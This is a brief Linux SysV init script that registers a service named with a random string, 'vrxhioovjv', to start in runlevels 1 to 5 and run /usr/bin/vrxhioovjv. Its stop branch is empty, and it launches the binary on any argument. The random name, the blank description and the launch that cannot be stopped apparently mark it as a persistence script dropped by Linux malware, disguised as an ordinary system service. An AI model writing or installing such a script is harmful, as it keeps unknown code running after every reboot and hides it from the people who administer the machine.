#!/bin/sh
# chkconfig: 12345 90 90
# description: vrxhioovjv
### BEGIN INIT INFO
# Provides:		vrxhioovjv
# Required-Start:	
# Required-Stop:	
# Default-Start:	1 2 3 4 5
# Default-Stop:		
# Short-Description:	vrxhioovjv
### END INIT INFO
case $1 in
start)
	/usr/bin/vrxhioovjv
	;;
stop)
	;;
*)
	/usr/bin/vrxhioovjv
	;;
esac
